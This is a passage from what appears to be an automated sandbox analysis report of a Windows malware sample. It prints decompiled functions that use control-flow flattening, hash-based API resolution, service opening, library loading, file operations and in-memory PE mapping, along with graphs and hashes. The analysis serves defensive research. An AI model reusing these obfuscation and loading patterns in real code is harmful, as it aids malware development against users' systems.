					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E003DB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x3ddec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E003D3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E003D3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x3ddec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x3dde3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E003D3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E003D3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x3dde3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x3de1d4;
										if(_t93 == 0) {
											_t97 = E003D3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E003D3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x3de1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x3de3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E003D3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E003D3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x3de3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x3dde04;
							if( *0x3dde04 == 0) {
								_t95 = E003D3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x3dde04 = E003D3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x003d8400
                                                                                0x003d8400
                                                                                0x003d8406
                                                                                0x003d840e
                                                                                0x003d8416
                                                                                0x003d841e
                                                                                0x003d8426
                                                                                0x003d842b
                                                                                0x003d8430
                                                                                0x003d8438
                                                                                0x003d8440
                                                                                0x003d8445
                                                                                0x003d844a
                                                                                0x003d8452
                                                                                0x003d845a
                                                                                0x003d8462
                                                                                0x003d846a
                                                                                0x003d8472
                                                                                0x003d847a
                                                                                0x003d8482
                                                                                0x003d8491
                                                                                0x003d8496
                                                                                0x003d849a
                                                                                0x003d84a2
                                                                                0x003d84af
                                                                                0x003d84b3
                                                                                0x003d84bb
                                                                                0x003d84c3
                                                                                0x003d84cb
                                                                                0x003d84cf
                                                                                0x003d84d7
                                                                                0x003d84df
                                                                                0x003d84df
                                                                                0x003d84e3
                                                                                0x003d84e3
                                                                                0x003d84e3
                                                                                0x003d84e3
                                                                                0x003d84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d84ef
                                                                                0x003d866e
                                                                                0x003d8676
                                                                                0x003d8696
                                                                                0x003d869a
                                                                                0x003d86a2
                                                                                0x003d86a6
                                                                                0x003d86aa
                                                                                0x003d86b2
                                                                                0x003d86b4
                                                                                0x00000000
                                                                                0x003d86ba
                                                                                0x003d86ba
                                                                                0x003d86c5
                                                                                0x003d86d1
                                                                                0x003d86bc
                                                                                0x003d86bc
                                                                                0x003d86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d86be
                                                                                0x003d86ba
                                                                                0x003d84f5
                                                                                0x003d84fb
                                                                                0x003d854a
                                                                                0x003d854f
                                                                                0x003d8551
                                                                                0x003d8558
                                                                                0x003d855d
                                                                                0x003d8564
                                                                                0x003d8569
                                                                                0x003d8569
                                                                                0x003d8578
                                                                                0x003d857c
                                                                                0x003d857e
                                                                                0x003d8589
                                                                                0x003d858f
                                                                                0x003d8591
                                                                                0x003d8598
                                                                                0x003d859d
                                                                                0x003d85a4
                                                                                0x003d85a9
                                                                                0x003d85a9
                                                                                0x003d85af
                                                                                0x00000000
                                                                                0x003d84fd
                                                                                0x003d8503
                                                                                0x003d8543
                                                                                0x00000000
                                                                                0x003d8505
                                                                                0x003d850b
                                                                                0x00000000
                                                                                0x003d8511
                                                                                0x003d8511
                                                                                0x003d8518
                                                                                0x003d851f
                                                                                0x003d8524
                                                                                0x003d852b
                                                                                0x003d8530
                                                                                0x003d8530
                                                                                0x003d853a
                                                                                0x003d853c
                                                                                0x00000000
                                                                                0x003d853c
                                                                                0x003d850b
                                                                                0x003d8503
                                                                                0x003d84fb
                                                                                0x00000000
                                                                                0x003d84ef
                                                                                0x003d85c8
                                                                                0x003d85ce
                                                                                0x003d8630
                                                                                0x003d8635
                                                                                0x003d8637
                                                                                0x003d863e
                                                                                0x003d8643
                                                                                0x003d864a
                                                                                0x003d864f
                                                                                0x003d864f
                                                                                0x003d8660
                                                                                0x003d8662
                                                                                0x00000000
                                                                                0x003d85d0
                                                                                0x003d85d0
                                                                                0x003d85d6
                                                                                0x00000000
                                                                                0x003d85d8
                                                                                0x003d85de
                                                                                0x003d85e0
                                                                                0x003d85e7
                                                                                0x003d85ec
                                                                                0x003d85fa
                                                                                0x003d85fa
                                                                                0x003d861d
                                                                                0x003d861f
                                                                                0x003d8621
                                                                                0x003d8624
                                                                                0x00000000
                                                                                0x003d8626
                                                                                0x003d8626
                                                                                0x00000000
                                                                                0x003d8626
                                                                                0x003d8624
                                                                                0x003d85d6
                                                                                0x00000000
                                                                                0x003d85b1
                                                                                0x003d85b1
                                                                                0x003d85b1
                                                                                0x003d85bd
                                                                                0x003d85bd
                                                                                0x003d85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 003D861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: e71d640c0f93d14238548f10bb0e432e2a85fa7a1c64fa5f88f17f2bb5c0123d
                                                                                • Instruction ID: b12802969422ba19bbe954c83e8fa9e332d6a9b8f50a2812c84426fe3e13175a
                                                                                • Opcode Fuzzy Hash: e71d640c0f93d14238548f10bb0e432e2a85fa7a1c64fa5f88f17f2bb5c0123d
                                                                                • Instruction Fuzzy Hash: 6461E572A093119FC716DF68E85566FBBE9AB90714F00891EF4958B390DB74ED048F82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C0D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 2c0d60-2c0dd5 call 2c0ed0 VirtualAlloc RtlMoveMemory 164 2c0ebe-2c0ec4 160->164 165 2c0ddb-2c0dde 160->165 165->164 166 2c0de4-2c0de6 165->166 166->164 167 2c0dec-2c0df0 166->167 167->164 169 2c0df6-2c0dfd 167->169 170 2c0eaf-2c0ebb 169->170 171 2c0e03-2c0e36 call 2c1140 RtlMoveMemory 169->171 171->164 175 2c0e3c-2c0e4a VirtualAlloc 171->175 176 2c0e4c-2c0e52 175->176 177 2c0e89-2c0ea0 RtlFillMemory 175->177 178 2c0e5a-2c0e68 176->178 179 2c0e54-2c0e56 176->179 177->164 182 2c0ea2-2c0ea5 177->182 178->164 181 2c0e6a-2c0e7d RtlMoveMemory 178->181 179->178 181->164 183 2c0e7f-2c0e83 181->183 182->164 184 2c0ea7-2c0ea9 182->184 183->164 185 2c0e85 183->185 184->170 184->171 185->177
                                                                                APIs
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002C0F08
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002C0F3E
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002C0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002C0DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002C0DC3
                                                                                  • Part of subcall function 002C1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002C0EFD,00000000), ref: 002C1155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002C0E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002C0E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002C0E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 002C0E98
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 831a95cac9bd874887b93b1cd025871b5137eeddc2996e1b877ad7e42fbb9c6d
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: E331F4B1A54341ABD314DB20CC85FAB73E9EBC9380F080E2CB94893351D635D8A0CBA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D8E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 3d8e80-3d8e98 187 3d8ea0-3d8ea5 186->187 188 3d8eab 187->188 189 3d8f7a-3d8f7f 187->189 190 3d8f3f-3d8f46 188->190 191 3d8eb1-3d8eb6 188->191 192 3d8f85-3d8f8a 189->192 193 3d9011-3d9016 189->193 194 3d8f48-3d8f5e call 3d3f00 call 3d3e60 190->194 195 3d8f63-3d8f75 190->195 196 3d8ebc-3d8ec1 191->196 197 3d901b-3d9022 191->197 198 3d8f8c-3d8f91 192->198 199 3d8fce-3d8fd5 192->199 193->187 194->195 195->187 200 3d8efc-3d8f03 196->200 201 3d8ec3-3d8ec8 196->201 207 3d903f 197->207 208 3d9024-3d903a call 3d3f00 call 3d3e60 197->208 202 3d8fbb-3d8fc0 198->202 203 3d8f93-3d8fa3 198->203 205 3d8fd7-3d8fed call 3d3f00 call 3d3e60 199->205 206 3d8ff2-3d900c OpenServiceW 199->206 215 3d8f05-3d8f1b call 3d3f00 call 3d3e60 200->215 216 3d8f20-3d8f2f 200->216 201->202 209 3d8ece-3d8ed5 201->209 202->187 212 3d8fc6-3d8fcd 202->212 210 3d8fae-3d8fb6 203->210 211 3d8fa5-3d8fac 203->211 205->206 206->187 222 3d9042-3d9049 207->222 208->207 220 3d8ed7-3d8eed call 3d3f00 call 3d3e60 209->220 221 3d8ef2-3d8efa 209->221 210->187 211->210 211->211 215->216 216->222 233 3d8f35-3d8f3a 216->233 220->221 221->187 233->187
                                                                                C-Code - Quality: 66%
                                                                                			E003D8E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x3de270 == 0) {
									 *0x3de270 = E003D3E60(_t25, E003D3F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x3de54c; // 0x5be240
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x3de4c8;
						if(_t11 == 0) {
							_t11 = E003D3E60(_t25, E003D3F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x3de4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x3de18c;
							if(_t15 == 0) {
								_t15 = E003D3E60(_t25, E003D3F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x3de18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x3de310;
								if(_t19 == 0) {
									_t19 = E003D3E60(_t25, E003D3F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x3de310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x3de18c;
									if(_t22 == 0) {
										_t22 = E003D3E60(_t25, E003D3F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x3de18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x003d8e82
                                                                                0x003d8e86
                                                                                0x003d8e8c
                                                                                0x003d8e91
                                                                                0x003d8e96
                                                                                0x003d8e98
                                                                                0x003d8ea0
                                                                                0x003d8ea0
                                                                                0x003d8ea0
                                                                                0x003d8ea0
                                                                                0x003d8ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d8f7f
                                                                                0x003d9011
                                                                                0x00000000
                                                                                0x003d8f85
                                                                                0x003d8f8a
                                                                                0x003d8fd5
                                                                                0x003d8fed
                                                                                0x003d8fed
                                                                                0x003d8ff9
                                                                                0x003d8ffb
                                                                                0x003d9009
                                                                                0x00000000
                                                                                0x003d8f8c
                                                                                0x003d8f91
                                                                                0x00000000
                                                                                0x003d8f93
                                                                                0x003d8f93
                                                                                0x003d8f99
                                                                                0x003d8fa3
                                                                                0x003d8fa5
                                                                                0x003d8fa8
                                                                                0x003d8fae
                                                                                0x003d8fb1
                                                                                0x00000000
                                                                                0x003d8fb1
                                                                                0x003d8f91
                                                                                0x003d8f8a
                                                                                0x00000000
                                                                                0x003d8f7f
                                                                                0x003d8eab
                                                                                0x003d8f3f
                                                                                0x003d8f46
                                                                                0x003d8f59
                                                                                0x003d8f5e
                                                                                0x003d8f5e
                                                                                0x003d8f64
                                                                                0x003d8f6d
                                                                                0x003d8f70
                                                                                0x00000000
                                                                                0x003d8eb1
                                                                                0x003d8eb6
                                                                                0x003d901b
                                                                                0x003d9022
                                                                                0x003d9035
                                                                                0x003d903a
                                                                                0x003d903a
                                                                                0x003d9040
                                                                                0x00000000
                                                                                0x003d8ebc
                                                                                0x003d8ec1
                                                                                0x003d8efc
                                                                                0x003d8f03
                                                                                0x003d8f16
                                                                                0x003d8f1b
                                                                                0x003d8f1b
                                                                                0x003d8f2b
                                                                                0x003d8f2f
                                                                                0x003d9042
                                                                                0x003d9049
                                                                                0x003d8f35
                                                                                0x003d8f35
                                                                                0x00000000
                                                                                0x003d8f35
                                                                                0x003d8ec3
                                                                                0x003d8ec8
                                                                                0x00000000
                                                                                0x003d8ece
                                                                                0x003d8ece
                                                                                0x003d8ed5
                                                                                0x003d8ee8
                                                                                0x003d8eed
                                                                                0x003d8eed
                                                                                0x003d8ef3
                                                                                0x003d8ef5
                                                                                0x00000000
                                                                                0x003d8ef5
                                                                                0x003d8ec8
                                                                                0x003d8ec1
                                                                                0x003d8eb6
                                                                                0x00000000
                                                                                0x003d8fbb
                                                                                0x003d8fbb
                                                                                0x003d8fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,005BE240,003D8782,?,3251FEFE,?), ref: 003D8FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: @[$uw(#$uw(#
                                                                                • API String ID: 3098006287-2499180157
                                                                                • Opcode ID: 8a3628a550878e5011acc1b1c2203dc82907968020f4d867064a7bfadf06afed
                                                                                • Instruction ID: a3616eb24c9f6a197f313702d67cd7ff2b66afb1a4c01fa1fbb0bce39591119e
                                                                                • Opcode Fuzzy Hash: 8a3628a550878e5011acc1b1c2203dc82907968020f4d867064a7bfadf06afed
                                                                                • Instruction Fuzzy Hash: 2C41A323B052049BDB226BBDBC8077A279EE794750F51082BF945CF781EE60EC445B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D7120, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 241 3d7120 242 3d7125-3d712a 241->242 243 3d71b4-3d71b9 242->243 244 3d7130 242->244 245 3d71bb 243->245 246 3d7207-3d720c 243->246 247 3d7136-3d713b 244->247 248 3d7233-3d7248 call 3d34c0 244->248 251 3d71bd-3d71c2 245->251 252 3d71ee-3d7202 call 3d7080 245->252 254 3d720e-3d7222 call 3d7080 246->254 255 3d7227-3d722c 246->255 249 3d713d 247->249 250 3d7190-3d7195 247->250 268 3d724a-3d7260 call 3d3f00 call 3d3e60 248->268 269 3d7265-3d7278 LoadLibraryW 248->269 257 3d713f-3d7144 249->257 258 3d717a-3d718e call 3d7080 249->258 250->255 263 3d719b-3d71af call 3d7080 250->263 259 3d71d5-3d71e9 call 3d7080 251->259 260 3d71c4-3d71c9 251->260 252->242 254->242 255->242 256 3d7232 255->256 265 3d7164-3d7178 call 3d7080 257->265 266 3d7146-3d714b 257->266 258->242 259->242 260->255 267 3d71cb-3d71d0 260->267 263->242 265->242 266->255 275 3d7151-3d7162 call 3d7080 266->275 267->242 268->269 279 3d727a-3d7290 call 3d3f00 call 3d3e60 269->279 280 3d7295-3d72a0 269->280 275->242 279->280 291 3d72bd-3d72c5 280->291 292 3d72a2-3d72b8 call 3d3f00 call 3d3e60 280->292 292->291
                                                                                C-Code - Quality: 85%
                                                                                			E003D7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E003D34C0(0x3dd830);
							__eflags =  *0x3ddd1c;
							if( *0x3ddd1c == 0) {
								 *0x3ddd1c = E003D3E60(_t21, E003D3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x3de548; // 0x5f7ee0
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x3de494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E003D3E60(_t21, E003D3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x3de494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x3ddf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E003D3E60(_t21, E003D3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x3ddf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E003D7080(_t21, 0x3dd7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E003D7080(_t21, 0x3dd8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E003D7080(_t21, 0x3dd800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E003D7080(_t21, 0x3dd860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E003D7080(_t21, 0x3dd890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E003D7080(_t21, 0x3dd7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E003D7080(_t21, 0x3dd8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x003d7120
                                                                                0x003d7120
                                                                                0x003d7120
                                                                                0x003d7125
                                                                                0x003d7125
                                                                                0x003d7125
                                                                                0x003d7125
                                                                                0x003d712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d7130
                                                                                0x003d723f
                                                                                0x003d7246
                                                                                0x003d7248
                                                                                0x003d7260
                                                                                0x003d7260
                                                                                0x003d7266
                                                                                0x003d7268
                                                                                0x003d726e
                                                                                0x003d7271
                                                                                0x003d7276
                                                                                0x003d7278
                                                                                0x003d728b
                                                                                0x003d7290
                                                                                0x003d7290
                                                                                0x003d7297
                                                                                0x003d7299
                                                                                0x003d729e
                                                                                0x003d72a0
                                                                                0x003d72b3
                                                                                0x003d72b8
                                                                                0x003d72b8
                                                                                0x003d72c5
                                                                                0x003d7136
                                                                                0x003d7136
                                                                                0x003d713b
                                                                                0x003d7190
                                                                                0x003d7195
                                                                                0x00000000
                                                                                0x003d719b
                                                                                0x003d71a5
                                                                                0x003d71aa
                                                                                0x00000000
                                                                                0x003d71aa
                                                                                0x003d713d
                                                                                0x003d713d
                                                                                0x003d7184
                                                                                0x003d7189
                                                                                0x00000000
                                                                                0x003d713f
                                                                                0x003d7144
                                                                                0x003d716e
                                                                                0x003d7173
                                                                                0x00000000
                                                                                0x003d7146
                                                                                0x003d7146
                                                                                0x003d714b
                                                                                0x00000000
                                                                                0x003d7151
                                                                                0x003d7158
                                                                                0x003d715d
                                                                                0x00000000
                                                                                0x003d715d
                                                                                0x003d714b
                                                                                0x003d7144
                                                                                0x003d713d
                                                                                0x003d713b
                                                                                0x00000000
                                                                                0x003d7130
                                                                                0x003d71b4
                                                                                0x003d71b9
                                                                                0x003d7207
                                                                                0x003d720c
                                                                                0x00000000
                                                                                0x003d720e
                                                                                0x003d7218
                                                                                0x003d721d
                                                                                0x00000000
                                                                                0x003d721d
                                                                                0x003d71bb
                                                                                0x003d71bb
                                                                                0x003d71f8
                                                                                0x003d71fd
                                                                                0x00000000
                                                                                0x003d71bd
                                                                                0x003d71bd
                                                                                0x003d71c2
                                                                                0x003d71df
                                                                                0x003d71e4
                                                                                0x00000000
                                                                                0x003d71c4
                                                                                0x003d71c4
                                                                                0x003d71c9
                                                                                0x00000000
                                                                                0x003d71cb
                                                                                0x003d71cb
                                                                                0x00000000
                                                                                0x003d71cb
                                                                                0x003d71c9
                                                                                0x003d71c2
                                                                                0x003d71bb
                                                                                0x00000000
                                                                                0x003d7227
                                                                                0x003d7227
                                                                                0x003d7227
                                                                                0x003d7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003D68AC), ref: 003D7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9$~_
                                                                                • API String ID: 1029625771-760739506
                                                                                • Opcode ID: d800359d45e8aab94c538e4d0c3ae9ea474af533dbf2989339b52b39fdb1103d
                                                                                • Instruction ID: 769eeb490d6cddb4b0017cf5828d3a7745ba3bac3ed0d0b5715325250f790418
                                                                                • Opcode Fuzzy Hash: d800359d45e8aab94c538e4d0c3ae9ea474af533dbf2989339b52b39fdb1103d
                                                                                • Instruction Fuzzy Hash: 2231C123B4D14043DA277BBA789236E22AEDBA1304F61496BF051CFB95FD26CE015392
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 301 3d3780-3d3793 302 3d3795-3d37ab call 3d3f00 call 3d3e60 301->302 303 3d37b0-3d37c5 301->303 302->303 308 3d37c7-3d37dd call 3d3f00 call 3d3e60 303->308 309 3d37e2-3d37fa 303->309 308->309 315 3d37fc-3d3812 call 3d3f00 call 3d3e60 309->315 316 3d3817-3d3832 309->316 315->316 322 3d384f-3d385e 316->322 323 3d3834-3d384a call 3d3f00 call 3d3e60 316->323 329 3d387b-3d38b4 322->329 330 3d3860-3d3876 call 3d3f00 call 3d3e60 322->330 323->322 336 3d38b6-3d38cc call 3d3f00 call 3d3e60 329->336 337 3d38d1-3d38e2 SHFileOperationW 329->337 330->329 336->337
                                                                                C-Code - Quality: 62%
                                                                                			E003D3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
